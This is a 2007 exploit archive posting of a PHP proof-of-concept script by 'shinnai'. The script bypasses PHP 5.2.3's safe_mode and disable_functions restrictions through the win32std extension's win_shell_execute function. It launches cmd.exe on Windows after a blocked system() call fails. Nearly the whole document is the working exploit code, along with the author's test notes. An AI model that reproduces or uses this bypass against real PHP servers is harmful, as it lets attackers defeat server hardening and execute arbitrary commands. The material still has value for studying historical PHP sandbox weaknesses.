Home / os / solaris

php523-win32std.txt

Posted on 25 July 2007

<?php //PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass //author: shinnai //mail: shinnai[at]autistici[dot]org //site: http://shinnai.altervista.org //Tested on xp Pro sp2 full patched, worked both from the cli and on apache //Thanks to rgod for all his precious advises :) //I set php.ini in this way: //safe_mode = On //disable_functions = system //if you launch the exploit from the cli, cmd.exe will be wxecuted //if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager if (!extension_loaded("win32std")) die("win32std extension required!"); system("cmd.exe"); //just to be sure that protections work well win_shell_execute("..\..\..\..\windows\system32\cmd.exe"); ?>

 

TOP